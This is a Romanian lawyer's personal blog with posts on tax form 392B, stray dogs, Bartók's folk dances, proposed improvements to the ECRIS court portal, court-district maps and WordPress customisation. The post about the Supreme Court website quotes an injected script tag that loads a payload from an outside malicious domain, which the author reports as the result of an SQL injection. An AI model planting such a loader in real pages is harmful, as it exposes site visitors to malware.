alinclincea.ro


M-am mutat: alinclincea.ro

 

Reclame

Scurtă plimbare prin iadul fiscal românesc – declarația 392B


Citeam că nedepunerea la termen a declarațiilor 392A și 392B se sancționează cu niște amenzi deloc de neglijat. Chiar și baroul are un anunț. Simțindu-mă vizat de obligația de declarare respectivă am urmat un pic firul textelor normative pentru a înțelege mai bine de ce, cum etc.

Am vizitat pagina ANAF indicată și în articol. Am descărcat progrămelul oferit de ANAF (D392_2011). Nu e locul aici să comentez despre programul oferit de ANAF – despre faptul că în universul lor există numai Windows și .exe, că aspectul aplicației trece cu un bocanc sovietic peste orice înseamnă interfață grafică modernă, stil, ergonomie, comportament intuitiv etc.

Am mai navigat pe sait până am ajuns la o pagină din care să descarc și declarația în format PDF – declarația 392B se referă la persoane impozabile neînregistrate în scopuri de TVA și care nu îndeplinesc condițiile de plafon etc. pentru TVA (cazul meu).

Declarația 392B este prevăzută de Ordinul președintelui Agenției Naționale de Administrare Fiscală nr. 1081/2011 pentru aprobarea modelului și conținutului unor formulare de declarații informative (publicat în Monitorul Oficial, Partea I, nr. 103/2011). În anexa la ordin sunt enunțate instrucțiunile de completare. Acolo găsesc câteva noțiuni precum: „Cifra de afaceri”, „Livrări de bunuri și prestări de servicii”, „Jurnalul pentru vânzări”, „Achiziții”, „Jurnalul pentru cumpărări”. Chiar dacă, realist vorbind, nu ne putem aștepta ca legea să aibă precizia unei definiții din matematică, totuși noțiunile utilizate într-un act normativ (unul fiscal!) nu ar trebui să fie deloc vagi, ci suficient de clare încât să permită contribuabilului să își cunoască exact obligațiile și drepturile – v. articolul 3 din Codul fiscal sau considerente din jurisprudența CJUE precum C-143/93 Gebroeders van Es Douane Agenten BV c. Inspecteur der Invoerrechten en Accijnzen, paragraful 27, sau T-115/94 Opel Austria GmbH c. Consiliul Uniunii Europene, paragraful 124; v. și jurisprudența CEDO – Cauza Rotaru contra României, paragraful 55. Așadar, presupunem că fiecare din noțiunile enumerate are o semnificație îndeajuns de clară încât să putem opera cu ea.

Ca avocat neplătitor de TVA și obligat să țin contabilitatea în partidă simplă nu îmi sunt familiare cele două registre contabile din care ar trebui să preiau datele pentru declarația 392B; registrul-jurnal de încasări și plăți este singurul pe care l-am completat până acum. Apropo de reglementarea privind contabilitatea în partidă simplă, în acel ordin din 2004 se fac trimiteri către Hotărârea Guvernului nr. 831/1997 pentru aprobarea modelelor formularelor comune privind activitatea financiară și contabilă…. În prezent acele trimiteri nu mai duc nicăieri întrucât hotărârea de Guvern a fost abrogată în 2009, fără a mai fi prevăzut altceva în loc.

La o căutare pe Internet după „jurnal pentru vânzări” și „jurnal pentru cumpărări” găsesc Ordinul Ministrului Finanțelor Publice nr. 425/1998 (publicat în Monitorul Oficial, Partea I, 391bis/1998).

În acest act normativ cele două jurnale au chiar și coduri: 14-6-12/a (Jurnalul pentru vânzări) și 14-6-17/b (Jurnalul pentru cumpărări). Verific apoi dacă ordinul mai este în vigoare. Se pare că nu. A fost abrogat de Ordinul Ministrului Finanțelor Publice nr. 1850/2004. Și el a fost abrogat – v. Ordinul Ministrului Economiei și Finanțelor nr. 3512/2008 (publicat în Monitorul Oficial, Partea I, nr. 870bis/2008). Abia acesta este actul aflat în vigoare în prezent, fiind modificat prin Ordinul Ministrului Finanțelor Publice nr. 2869/2010. Cele din urmă ordine nu mai au în conținutul lor reglementări referitoare la cele două jurnale buclucașe.

Cu puțin noroc, continuând căutarea pe Internet, găsesc o referire la actul normativ care ar reglementa jurnalele: Ordinul Ministrului Economiei și Finanțelor nr. 1372/2008 (publicat în Monitorul Oficial, Partea I, nr. 364/2008). În mărinimia emitentului, persoanele impozabile sunt lăsate să aprecieze asupra modului în care își vor ține evidența „corectă și completă” (v. în special articolul 1 alineatele (3)-(4) și articolul 2). Textul prevede că persoanele impozabile pot să folosească modelele orientative incluse în anexe. Este limpede că aceste persoane pot la fel de bine să nu folosească niciun fel de evidență de tipul jurnalului pentru vânzări și a celui pentru cumpărări. Își țin evidența în registrul-jurnal de încasări și plăți sau în formă electronică, declară și plătesc impozitele cu grija cetățeanului naiv… Și așa trece timpul până când își mai aduce aminte vreun ministru sau șef al ANAF că din hățișul de declarații și formulare existente deja în circulație parcă lipsește totuși ceva… o informativă care să fie completată folosind date dintr-un registru opțional… Și dă sfară în țară că pentru nedepunerea declarației 392B fiscul va amenda drastic contribuabilii indisciplinați care țineau cu orice preț să eludeze ansamblul coerent, simplu, clar, public și accesibil al reglementărilor fiscale.

Bineînțeles, s-au erodat demult așteptările ca legislația noastră să fie clară și redactată coerent, așa că îmi voi completa declarația folosind datele din registrul-jurnal de încasări și plăți. E un pic mai complicat să clasific în vreo categorie onorariile retrocedate de maestru – reprezintă ele contraprestația unei prestări de servicii? Plata unor taxe/contribuții către barou, CAA, INPPA, bugetul de stat este o „achiziție”? La fel, în lipsa jurnalelor pentru vânzări și cumpărări, e foarte complicat să calculez suma „achizițiilor” de la plătitori de TVA. Nicio problemă, dacă voi greși, fiscul va avea grijă să mă disciplineze pentru declarația care nu ar fi corectă și completă…

www.scj.ro a primit o injecție cu SQL


Încercam să aflu ceva de pe saitul Înaltei Curți de Casație și Justiție (denumit, foarte românește, folosind inițialele de la Supreme Court of Justice… până la urmă We’re all living in America, nu?).

Lista de ședințe nu funcționează. Văzând ceea ce era afișat, bănuiam că vreun dorel nu a închis cum trebuie niște ghilimele prin sursă. Încerc să aflu despre ce e vorba și văd ceva și mai drăgălaș: <script src=”http://lilupophilupop.com/sl.php”></script&gt;. O căutare pe Google lămurește problema – injecție SQL. ECRIS (versiunea anacronică, din 2005, pentru Î.C.C.J.) se pare că e vulnerabil. Cam cât de romantic ar fi ca și ECRIS IV, folosit de restul instanțelor din țară, să aibă astfel de vulnerabilități?…

Curtea de Apel București se fălește deja cu un nou sait (se putea mai bine… părerea mea), pe când unul nou, funcțional și util și la Î.C.C.J.?

La mulți ani!

Completare (4 ianuarie 2012): S-a reparat.

Citește și:
ECRIS – este bun, dar poate fi și mai bun

Cadoul meu de Moș Nicolae


Ieri, în drum spre barou, am hotărât să caut o rută mai scurtă pentru a evita monotonia drumului meu obișnuit. Îmi trebuie vreo 5 minute pentru a străbate cei 300 m între cabinet și barou (pe undeva prin zona centrală a Craiovei), dar ieri am avut prea puțină răbdare și prea mult „spirit de aventură”. În loc să merg pe Calea București, am mers printre blocuri.

Aventura nu s-a lăsat prea mult așteptată. M-au întâmpinat doi câini cărora le călcasem teritoriul. Unul dintre ei a reușit să mă „composteze” tocmai când credeam că scăpasem din zona fierbinte. Am simțit mușcătura de deasupra gleznei, dar nu i-am dat prea multă importanță. După ce am mai mers câteva zeci de metri zona mușcată a început să doară. Abia atunci am observat că aveam pantalonul rupt destul de serios și că rana sângera încet.

Mi-am rezolvat treburile la barou, iar apoi am revenit acasă. Mi-am curățat și pansat rana.
Abia pe seară, la insistența Cristianei și după ce apucasem să citesc pe net despre rabie, am mers la spital pentru un vaccin.

La registratura urgenței chiar înainte să apuc să întreb ce-i de făcut, mi-a luat-o înainte o domnișoară care spunea că ea a fost prima. Am lăsat-o să întrebe. Așa am aflat că și ea fusese mușcată de un câine vagabond.
După ce am dat informațiile cerute de asistentă am așteptat să îmi vină rândul la vaccin. Nu era vorba de unul antirabic, ci de unul antitetanos.

Am așteptat vreo oră și jumătate până să fiu strigat – cazuri cu prioritate, urgențe etc. Am fost vaccinat și am primit o rețetă și o trimitere pentru un consult privind oportunitatea unui vaccin antirabic.

De Sf. Nicolae, după rezolvarea cazului de la judecătorie, am mers la spital. Doctorul de la boli infecțioase a apreciat că nu e cazul pentru un vaccin antirabic, riscul de infectare fiind minim (nu sunt un fan al înțepăturilor, așa că nu am așteptat să se răzgândească). Am cumpărat apoi și pastilele (Oxacilină).

Frumos dar…

Nu am vreo fobie față de câini. Am crescut la țară, unde bunicii mei aveau vreo 14 câini, de la pitici (denumiți copoi în acea regiune) la câini mari, ciobănești. Când aveam 5 ani am fost mușcat chiar de față de unul dintre câinii mari din curte. Nu m-a afectat prea mult asta – am doar o cicatrice destul de mică pe obraz. Am continuat să fiu prieten cu câinii. Ori de câte ori mai ajung pe la țară îmi place să mă joc cu ei. Nici față de câinii de pe stradă nu am vreo teamă, chiar dacă am fost alergat de turme de câini când eram cu bicicleta.

Cu toate astea, deja nu mai pot asculta fără reacție „dezbaterea” despre câinii fără stăpân, eutanasie etc. Sunt sătul să aud că victimele sunt, până la urmă, vinovate pentru că au fost mușcate (am auzit și inepții precum: câinii sunt niște „biete suflete”, care mușcă numai oamenii răi; numai câinii care au mușcat pe cineva ar trebui eutanasiați etc.). Sunt sătul și să văd marii apărători ai „drepturilor” animalelor (ex. avocata P. Iacob, ex-senatorul M. Marinescu) intervenind la TV de fiecare dată când se discută despre eutanasierea câinilor fără stăpân. De fiecare dată sunt uimit de apărarea înverșunată pe care o fac animalelor, uitând că victimele lor sunt oameni. Pentru unii pare chiar scuzabilă suferința pricinuită unui om. Cei care mor (exemplu, alt exemplu) sau care rămân mutilați sunt vinovații. Lor le este mereu imputabilă fie neatenția, fie prostia, fie răutatea. Câinii sunt doar biete victime ale victimelor lor…

Prevenirea înmulțirii câinilor vagabonzi este una, iar prevenirea riscului de a fi mușcat este alta. Nu există nicio garanție că un câine care a fost sterilizat (dacă a fost…), marcat cu un plastic pe ureche și apoi lăsat pe stradă, nu mai poate mușca.

E paradoxal că este considerată contravenție „lăsarea în libertate ori fără supraveghere a animalelor care pot prezenta pericol pentru persoane sau bunuri” (Legea 61/1991, articolul 3:17; v. și feluritele acte ale administrației publice locale), dar față de animalele fără stăpân care sălășluiesc în oraș și care pot prezenta pericol pentru persoane autoritățile nu au nicio responsabilitate. Chiar și C.E.D.O. a condamnat recent statul român într-o speță care a pornit de la un incident cu câini vagabonzi.

E paradoxal și că, în vreme ce alte animale (ex. miei, porci, găini) sunt ucise pentru hrană (de multe ori, după ce au fost crescute în ferme în condiții revoltătoare), fără campanii de protest, în cazul uciderii câinilor fără stăpân există o opoziție însuflețită de atât „umanism”.

Nu-mi fac iluzii că legea votată recent, care a provocat atâtea istericale pe holurile parlamentului și pe la posturile TV, va schimba ceva. Consiliile locale vor dovedi umanism electoral, „cetățenii” se vor milostivi de bietele necuvântătoare, victimele vor continua să fie vinovate, iar cei care susțin eutanasia vor fi în continuare „criminali”, comparabili cu naziștii. S-a întâmplat vreodată ca literele unui text de lege să schimbe ceva în această țară?

@trolling off

1 Decembrie 2011


I. Pe Youtube, printre cel mai ușor de găsit compoziții ale lui Béla Bartók se află „Romanian Folk Dances” (Dansuri populare românești). Sunt șase piese scurte, ușor de ascultat, inspirate din folclorul românilor din Banat-Transilvania-Crișana (Béla Bartók s-a născut la Sânnicolau Mare, o comunitate care cu siguranță cuprindea și germani, și români, și sârbi, și maghiari, și țigani, și slovaci…):

1. Jocul cu bâtă
2. Brâul
3. Pe loc
4. Buciumeana
5. Poarga românească
6. Mărunțel

Am ales câteva interpretări care merită ascultate (poarga și mărunțelul sunt excelente!):

1. Varianta cântată strict după partitură de o orchestră kurdă:
Béla Bartók – Dansuri populare românești (The Kurdish String Orchestra)

2. Varianta cântată de o orchestră maghiară, cu câteva intervenții surprinzătoare ale grupului Muzsikás. Merită fiecare secundă:
Béla Bartók – Dansuri populare românești (The Danubia Orchestra & Muzsikás)

3. Varianta cântată de o orchestră țigănească, fără partituri, în sinagoga din Budapesta (muzică inspirată din folclorul românesc, compusă de un maghiar, cântată de țigani într-un lăcaș de cult evreiesc!)
Béla Bartók – Dansuri populare românești (The Rajko Orchestra)

II. Să trecem un pic și la dans. M-a impresionat o formație din Republica Moldova: Ansamblul JOC. Dansează excelent călușul oltenesc:

Dansul călușarilor (Ansamblul JOC)

Și pentru că v-am reamintit melodia, iat-o interpretată de o trupă de klezmer din Canada:

Călușarii – Beyond the Pale

Apropo de dansuri românești, am fost surprins să aflu că sunt o mulțime de clipuri cu străini (i.e. americani, japonezi, chinezi, danezi…) învâțând dansuri cu nume precum:

Floricica oltenească

Galaonul de la Bârca (chinezi în costume populare românești!…)

Alunelul bătut

Rustemul

Arcanul bătrânesc

Vulpiuța

Pe loc (iarăși Muzsikás și doi dansatori; v. și tema din dansurile lui Bartók)

La mulți ani!

Citește și:
Ce sărbătorim noi azi?
1 Decembrie

ECRIS – este bun, dar poate fi și mai bun


E greu să-mi închipui cum m-aș fi descurcat fără o aplicație precum ECRIS. Telefoane sau, mai rău, deplasări la grefă doar pentru a afla termene, soluții, numere de dosar etc.?! Probabil că instanțele ar fi avut nevoie de linii telefonice robuste și de o suplimentare serioasă de personal, care să facă față volumului mare de solicitări mărunte venite de la părți, avocați, experți… Din fericire, nu e cazul. De câțiva ani buni funcționează „Portalul instanțelor de judecată”, iar la sediul instanțelor există infochioșcuri care permit accesul la informații privind dosarele. Cea mai recentă versiune (IV) a ECRIS (probabil „Electronic Court Record Information System”) a primit deja critici din partea grefierilor. Ca utilizator, aflat pe latura read-only a interfeței aplicației, am adunat câteva observații despre cum cred că ar putea fi îmbunătățită.

1. Feedback

Criticile, observațiile, sugestiile ar fi mai eficiente dacă ar și ajunge la persoanele/instituțiile potrivite (v. Ministerul Justiției și producătorul aplicației). Vechea cutie pentru sugestii și reclamații are un corespondent electronic ușor de pus în operă – v. issue tracking system – care ar face inutilă discutarea acestor subiecte pe bloguri sau forumuri. Bugtrackerele folosite în procesele de asigurare a calității în programare (v. unul în acțiune), pot fi deschise și utilizatorilor de aplicații puse la dispoziție de instituții publice (v. ECRIS, Revisal etc.); de altfel, bugtrackerele pot fi extinse și asupra altor procese, nu neapărat legate de o aplicație software – ex. relațiile instituțiilor publice cu cetățenii, consultarea publică privind legiferarea.

ECRIS poate fi îmbunătățit pe baza feedbackului primit de la utilizatori – indiciu: issue tracker.

2. Mai multe informații

Informațiile care se găsesc pe portal sunt mult mai sărace decât cele afișate la infochioșcuri. De pildă, la infochioșcuri este afișată lista cu denumirile înscrisurilor existente la dosar (e adevărat, adesea incompletă) și termenele la care acestea au fost depuse, componența completului de judecată, numărul soluției pronunțate de instanță etc. Asemenea informații nu apar, însă, și pe portal. În ambele locuri nu ar strica și o ordonare cronologică (descrescătoare) a termenelor.
Din moment ce pe listele de ședință sunt afișate numele judecătorilor și ale grefierilor de ședință, de ce asemenea informații nu ar putea fi afișate și pe Internet? Bineînțeles, atât pe lista de ședințe, cât și pe fișa fiecărei cauze, pentru fiecare termen. Aceste informații pot fi elegant completate cu numele procurorilor de ședință (acolo unde e cazul) și ale reprezentanților părților (avocați, consilieri juridici, simpli mandatari). Ar prinde bine și o coerență în privința redactării numelor (dacă judecătorul este menționat ca Ionel POPESCU, de ce inculpatul sau vreo altă parte ar apărea ca IONESCU Gigi?! scrierea cu majuscule a numelui de familie ar aduce claritate pentru nume precum Viorel Ion).

Un alt detaliu care ar putea reduce numărul de requesturi HTTP pe sait ar fi afișarea cât mai detaliată și ergonomică a informațiilor. De exemplu, scenariul tipic de utilizare (cel puțin pentru mine) e următorul:

  1. accesez adresa http://noulportal.just.ro/;
  2. selectez județul, apoi instanța, apoi dau click pe linkul „Dosare” din lateral;
  3. caut fie numărul de dosar, fie un nume al unei părți;
  4. dau click pe rezultatul dorit din listă.

În fișa dosarului astfel obținută nu este indicat completul, ca să nu mai vorbesc despre ora de începere a ședinței sau despre sala de judecată. Pentru a afla, totuși, completul, accesez lista de ședințe pentru data dorită, verific lista fiecărui complet cu specializarea căutată (și sunt, de regulă, mai multe complete de penal sau de civil; trebuie văzută lista fiecăruia pentru a ajunge la cauza căutată) și dau click pe numărul de dosar. Abia așa aflu informații despre complet și ora de început a ședinței.
În ceea ce privește indicarea sălii de judecată, o soluție simplă ar fi conceperea unei scheme unice la nivel național (ex. Sala 1, nu Camera xyz) și a unor panouri de orientare, astfel încât orice persoană citată să știe cu siguranță încotro să meargă, fără a mai fi nevoie de indicații primite de la personalul instanței și fără a trebui să se familiarizeze cu obiceiurile administrative de acolo.

Navigarea pe portal în prezent e destul de unidirecțională și liniară. Un sistem simplu de breadcrumbs ar putea ajuta la orientare și la acces mai rapid la informații. De asemenea, starea curentă a cauzelor trebuie descrisă mai bine. De pildă, fișa unei cauze de la instanța de fond poate conține un link către fișa de la instanța din calea de atac (apel, recurs…), eventual cu menționarea părții care exercită calea de atac și a datei.

ECRIS ar putea afișa mai multe informații (indicativul completului de judecată, numele tuturor participanților în proces, sala de ședință, ora, calea de atac exercitată), într-un mod mai ergonomic.

3. Publicarea tuturor hotărârilor

Printre lamentările obișnuite în legătură cu justiția românească se află și cea privind practica neunitară – posibilitatea (adesea concretizată) ca două instanțe diferite (uneori, chiar două complete diferite ale aceleiași instanțe) să pronunțe soluții diferite asupra unor probleme similare. Primul pas spre un remediu ar fi să se cunoască practica (toată practica și numai practica…). Hotărârile sunt redactate folosind calculatoare. În paralel cu forma lor imprimată pe hârtie, pe portal ar putea fi foarte bine afișate cu link de download, în dreptul fiecărui termen de judecată.
Mă refer aici la toate hotărârile, indiferent de denumirea lor (încheieri, sentințe, decizii – v. articolul 255 din Codul de procedură civilă și articolul 311 din Codul de procedură penală).

Dispozitivul fiecărei hotărâri ar putea fi afișat în continuare pentru fiecare termen. E esențial ca acest dispozitiv să fie identic cu cel din documentul oferit spre descărcare. O rezolvare simplă ar fi: cu ajutorul interfeței grafice a ECRIS hotărârea este redactată pe părți (i.e. partea introductivă, considerentele, dispozitivul; numele și celelalte date fiind preluate automat din înregistrarea dosarului), iar datele sunt asamblate în funcție de cerințe (ex. toate părțile sunt exportate ca document; numai dispozitivul este afișat ca HTML).

Ar fi de preferat ca hotărârile să aibă un șablon unic (eventual, cu elemente grafice mai elaborate), să fie salvate într-un format precum PDF (mai dificil de editat) și să poarte semnătura electronică a membrilor completului de judecată (știu, asta sună deja a Star Trek…).

În acest fel nu numai că justiția ar deveni ceva mai transparentă și ușor de urmărit, dar s-ar atinge și obiectivul proiectului Jurindex (Toate hotărârile judecătorești pe Internet); v. și modelul francez. Simpla publicare a unor PDF-uri nu ar fi suficientă. Ar mai trebui ca sistemul să includă și un solid motor de căutare în baza de date și, eventual, o sortare inteligentă pe materii, faze procesuale etc.

ECRIS ar putea afișa toate hotărârile judecătorești (că doar toate poartă mențiunea că au fost pronunțate în ședință publică…) și semnate electronic, și indexate pentru a ușura documentarea juridică.

4. URL-uri simple, intuitive pentru dosare și pentru hotărâri

Un URL tipic folosit de portal arată cam așa: http://noulportal.just.ro/InstantaDosar.aspx?idInstitutie=54&d=MzA0MDAwMDAwMDAwMTExNTY*. Bun, putem identifica un query string cu un câmp idInstitutie care corespunde numărului de identificare al instanței stabilit prin regulamentul de ordine interioară al instanțelor, dar cel de-al doilea câmp (un număr codat în base64) este complet împotriva ideii de ergonomie și simplitate. Resursa respectivă poate fi accesată folosind un URL mai prietenos cu memoria și cu intuiția umană. Bunăoară, dacă numărul de dosar este 123456/12/2011, ce ar împiedica folosirea lui direct în URL (unul rescris mai simplu): http://portal.just.ro/d/123456/12/2011? (aici, d vine de la dosarul)

Dacă ar deveni vreodată posibilă accesarea hotărârilor pe Internet (v. punctul anterior), și URL-ul acestora ar trebui să fie simplu și intuitiv. O idee ar fi folosirea unei referințe relative la numărul de dosar, nu la numărul de ordine al hotărârilor instanței – ex. http://portal.just.ro/c/123456/12/2011/2 pentru a doua hotărâre din dosar. URL-urile mai scurte și mai intuitive ar fi utile și în cazul citării hotărârilor într-o lucrare scrisă. Comparați URL-ul folosit ca exemplu cu unul recomandat de C.E.D.O.:

http://cmiskp.echr.coe.int/tkp197/view.asp?action=html&documentId=824161&portal=hbkm&source=externalbydocnumber&table=F69A27FD8FB86142BF01C1166DEA398649

sau cu unul folosit de C.J.U.E.:

http://eur-lex.europa.eu/LexUriServ/LexUriServ.do?uri=CELEX:62009CJ0402:RO:HTML

Mai departe, cum ar fi dacă am putea fi ținuți la curent cu starea unui dosar prin RSS sau un serviciu web?

ECRIS ar putea folosi URL-uri simplificate, făcute intuitive și ușor de citat. ECRIS ar putea oferi informații în formate ușor de procesat prin mijloace electronice.

5. Fără numere de dosar atipice

Schema de numerotare a dosarelor este la prima vedere simplă: [număr curent]/[număr de identificare al instanței]/[an] (ex. 1234/56/2012). Cel puțin așa prevede articolul 992 din regulamentul de ordine interioară al instanțelor judecătorești.
Totuși, destul de frecvent pot fi întâlnite numere de dosar atipice, ornamentate cu alte componente – ex. dosarul 27259/215/2010*/a5 sau 16041..01/3/2008.

Dacă tot există un sistem clar de numerotare, care e justificarea pentru adaosurile atipice de asteriscuri, litere, cifre, după al treilea element al numărului de dosar?

ECRIS ar putea fi mai strict în ceea ce privește structura numărului de dosar.

6. Afișierul online

În anumite împrejurări, procedura prevede posibilitatea ca citarea să se facă la sediul consiliului local (articolul 177:4 din Codul de procedură penală) sau prin publicitate – la ușa instanței și în Monitorul Oficial sau într-un ziar mai răspândit (articolul 95:2 din Codul de procedură civilă). Evident, aceste proceduri sunt mai mult formale, nimeni nu se așteaptă ca persoana citată să compară doar pentru că și-a găsit numele printre colile A4 lipite cu generozitate și haotic la afișierul consiliului local sau printre însemnările deosebit de accesibile și gratuite din Monitorul Oficial, partea XYZ…

Probabil că afișarea pe Internet nu ar avea șanse semnificativ mai mari pentru ca procedura de citare să fie eficientă. Totuși, crearea unui afișier online, ca secțiune distinctă pe pagina fiecărei instanțe, ar putea avea o oarecare utilitate (oricum, implementarea ar fi una nedureroasă și necostisitoare – v. un exemplu pe saitul Curții Constituționale).

ECRIS ar putea afișa și citații în cazurile când se face citarea prin publicitate.

7. Comunicarea online

Iarăși Star Trek… Chiar recent citisem o știre despre respingerea ca tardivă a unei cereri de recurs trimise prin email. Codul de procedură civilă (articolul 1321:2) cuprinde mai nou posibilitatea încunoștințării părților prin mijloace electronice, iar Legea 455/2001 privind semnătura electronică prevede că în anumite condiții înscrisul semnat electronic „este asimilat, în ceea ce privește condițiile și efectele sale, cu înscrisul sub semnătură privată” (articolul 5). Totuși, aceste prevederi par a fi pur decorative din moment ce „sistemul” are o așa de mare aversiune față de comunicarea electronică.

Cum ar fi dacă fiecare parte ar primi din partea instanței (ministerului etc.), opțional bineînțeles, un certificat temporar emis exclusiv cu scopul de a-l folosi pentru semnarea documentelor comunicate în cursul procesului? De pildă, ca parte în proces solicit și primesc respectivul certificat, cu care semnez cererea de apel sau de recurs și o trimit instanței prin ECRIS. La fel de bine se pot depune și alte înscrisuri pe parcursul soluționării cauzei, fără a mai fi nevoie de coada de la registratură. Un model ar fi aplicația e-Curia a Curții de Justiție a Uniunii Europene.

Ar fi un început interesant…

ECRIS ar putea fi folosit și ca platformă de comunicare a actelor în cursul procesului.

8. Portal unic

Dintre instanțele judecătorești a căror activitate este reflectată pe portal lipsește Înalta Curte de Casație și Justiție. Aceasta are propriul sait, utilizând probabil o versiune mai veche a ECRIS (cu un IIS anterior lui .Net).
Deși în mod emfatic Curtea Constituțională este descrisă ca neaparținând autorității judecătorești, totuși ea funcționează după reguli familiare celorlalte instanțe (ex. ședințe publice, termene, citare). Ca și Î.C.C.J., Curtea Constituțională are propriul său mod (rudimentar) de afișare a informațiilor.

Nu ar fi decât în interesul publicului ca și activitatea acestor instanțe să fie reflectată în ECRIS, într-un mod unitar, coerent.

ECRIS ar putea include în mod unitar informații despre activitatea tuturor instanțelor, inclusiv a Î.C.C.J. și a C.C.R.

9. Performanța ECRIS

E de înțeles că și acum și pe viitor, traficul către portalul instanțelor de judecată va fi ridicat. Totuși, la sumele imense care apar în bugetele acestora (ex. în 2008 cheltuielile prevăzute pentru Tribunalul Dolj erau de 26.203.000 lei – peste 262 de miliarde de lei vechi…), e greu de crezut că nu se găsesc bani pentru servere mai acătării (care să nu fie îngenuncheate cu ușurința de acum) și pentru conexiuni în rețea cu viteză decentă.

ECRIS ar putea fi mai performant.

P.S. Nu puteam pierde ocazia de a semnala una dintre cele mai multiplicate greșeli de pe portal: „plângere contravetionala” – un -n- mâncat și niște diacritice scrise inconsecvent.

if ($anotimp == ‘toamna’){echo count($boboci);}


1. Hărțile circumscripțiilor instanțelor judecătorești din România

Încă de la începutul verii, cam în vremea „dezbaterilor” despre reorganizarea administrativ-teritorială a României, am terminat munca la două hărți la care m-am tot gândit încă din vremea când învățam pentru admiterea în barou despre competența teritorială a instanțelor. Este vorba despre o hartă a circumscripțiilor instanțelor civile și una a celor militare.

Hărțile ar fi urmat să ilustreze un articol de Wikipedia despre organizarea judiciară din România. N-am avut deloc inspirație să scriu ceva util, mai mult decât copy/paste din limba de lemn a textelor legale, așa că mă mulțumesc să public hărțile în speranța că poate altcineva își va cheltui o parte din timpul său pentru a scrie și ceva text.
Sper că așa va fi mai ușor de înțeles deosebirea între diferitele grade de jurisdicție: judecătorie < tribunal < curte de apel < Înalta Curte de Casație și Justiție.
Notă: Am inclus și modificările efectuate prin HG 868/2011 (MO 642/2011).

Descoperiri:

  • am aflat cu stupoare că existau destule instanțe numai în textul normativ, însă care nici după ani buni nu fuseseră înființate (ex. Judecătoria Bechet, Dolj); alte instanțe, precum Tribunalul Ilfov, nici azi nu sunt funcționale, în ciuda trâmbițatei înființări prin luna mai;
  • există, chiar și după desființarea unor instanțe, judecătorii cu circumscripții disproporționate ca suprafață – cf. Craiova vs. Adjud, Sinaia vs. Târgu-Jiu; există circumscripții cu forme neobișnuite (necontigue – Însurăței/Brăila, Huși/Vaslui; filiforme – Cluj-Napoca);
  • nu există o hartă oficială a unităților administrativ-teritoriale de nivel LAU 2 (municipii, orașe, comune) – cam așa arată ceea ce aș vrea să văd; baza pe care am folosit-o pentru trasarea limitelor comunelor este generată în GIS și folosește date mai vechi – așadar, e destul de probabil să existe mici erori în delimitări;
  • mai ales după anul 2000 harta administrativă a fost îmbogățită cu destule comune; împărțind electoratul sau doar realizând orgolii meschine („să fie și satul nostru un miez de comună!”) a fost împărțită și sărăcia – acum se plâng că nu au suficiente fonduri din impozite și taxe locale pentru a realiza ceva semnificativ în comună.
  • nu există o concepție unitară privind diversele diviziuni ale țării (ex. circumscripții de judecătorii, colegii electorale, circumscripții fiscale, silvice, circumscripții de curți de apel vs. regiuni de dezvoltare etc.).

2. forumgeografic.ro

Ideal era un CMS special conceput pentru reviste academice. Mi-a plăcut foarte mult Ambra (ex. PLoS One). Din nefericire, platforma pentru care a fost creat (Java) nu e suportată de hosting-ul nostru. Un alt obstacol semnificativ e modul de instalare (mult mai greu decât clica-clica obișnuit pentru CMS-uri populare). Pe locul doi în lista de opțiuni era Lodel. Marele lui neajuns a fost instalarea defectuoasă pe mașina de test (ex. cam prea multe deprecated-uri sâcâitoare pentru gustul meu). Am luat în calcul și OJS. Și el a dat câteva rateuri la instalare (ca și în cazul lui Lodel, codul nu e încă ajustat la PHP 5.x), dar putea fi făcut să meargă. Nu mi-a plăcut interfața îmbătrânită și extrem de „birocratizată” (are câte un tabelaș, câte un mesaj, câte o procedură pentru fiecare pas din peer review). Deși era tentantă și crearea unui CMS de la 0 în CodeIgniter, totuși a coda un întreg mecanism de autentificare, gestiune a conținutului, afișare etc. ar fi consumat enorm de mult timp pe care nu îl am la dispoziție.

… așa că am păstrat WordPress și am trecut la hăcuirea lui. Am renunțat la tema Atahualpa în favoarea uneia noi și (foarte) personalizate. Am adăugat noi plugin-uri, de departe cel mai util și frumos conceput mi s-a părut Codestyling Localization. Am adăugat noi funcții pentru lucrul cu taxonomii și custom fields, noi template-uri (pentru pagina de arhive, pentru paginile de cuprins, pentru pagina redacției – aici un simplu CSV exportat din OpenOffice.org Calc este procesat și afișat după șablon), generatoare de metadate Google Scholar și CrossRef. Datele bibliografice ale articolelor sunt trimise în JSON, iar de aici pot fi afișate în câteva formate de citare, dar și exportate ca file RIS și BibTeX. Am curățat baza de date de resturile de la teme și plugin-uri dezinstalate (wp_options păstra câteva sute bune de înregistrări complet inutile). Pentru orice funcție am încercat să nu stric prietenia cu qTranslate. Am păstrat URL-urile cât mai curate și intuitive (mai puțin folosirea id-ului pentru articole, în locul unui slug de lungime variabilă, adesea foarte lung). Am acordat puțină atenție și optimizării performanței (ex. caching, minification). Am vectorizat logo-ul făcut de Andra și am mai câștigat niște spațiu în partea de sus a paginii așezând logo-ul deasupra imaginii de fundal. A fost nevoie de un halou pentru ca logo-ul să fie vizibil indiferent de culoarea dominantă de sub el. Am modificat și șablonul Word pentru articole (sunt acolo și niște câmpuri care calculează prima și ultima pagină etc.).
Din perspectiva SEO saitul nu stă rău: un PageRank de 5 e decent (mai ales că până acum chiar nu m-a interesat SEO). Și Publish or Perish a început să raporteze indici din ce în ce mai buni (metadatele Google Scholar sunt responsabile aici).

Descoperiri:

  • PHP + collation + UTF-8 != ‘love’ – aveam nevoie ca autorii să fie ordonați alfabetic, într-un mod cât mai firesc (ex. Ț nu e între L și O, Î nu e înainte de B)… Totul se limita la sortarea unei array. N-am reușit să obțin ceea ce doream (și am încercat destule combinații de setlocale(), strcoll(), uasort() ș.a.m.d.). Până la urmă, cred că soluția cu care m-am consolat este cea mai bună, având în vedere că numele de autori pot avea inițiale cu diacritice neromânești (ex. Ž, Đ): ordonarea se face pe baza alfabetului latin, după ce caracterele cu diacritice sunt convertite în cel mai apropiat semn din setul ASCII;
